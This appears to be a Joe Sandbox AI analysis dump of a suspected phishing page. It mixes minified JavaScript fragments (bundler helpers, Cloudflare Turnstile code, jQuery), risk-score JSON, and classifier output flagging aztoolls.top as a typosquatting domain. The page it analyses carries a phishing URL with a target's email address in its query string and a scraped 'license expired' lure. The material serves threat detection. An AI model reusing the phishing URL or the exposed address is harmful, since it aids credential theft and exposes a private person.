r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://ajax.googleapis.com/ajax/libs/jquery/3.6.3... Model: Joe Sandbox AI |
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library. It does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The code primarily consists of utility functions and object manipulations typical of a library like jQuery. There are no interactions with external domains or aggressive DOM manipulations that would raise concern. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},S=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||S).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.3",E=function(e,t){return new E.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}E.fn=E.prototype={jquery:f,constructor:E,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=E.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return E.each(this,e)},map:function(n){return this.pushStack(E.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(E.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(E.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return 
this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},E.extend=E.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(E.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||E.isPlainObject(n)?n:{},i=!1,a[t]=E.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},E.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?E.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:v}),"function"==typeof Symbol&&(E.fn[Symbol.iterator]=t[Symbol.iterator]),E.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,S,y,s,c,v,E="s |
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Your license is expired. Please contact admin on skype: live:.cid.e08fe8b01d7680da",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://aztoolls.top Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://aztoolls.top |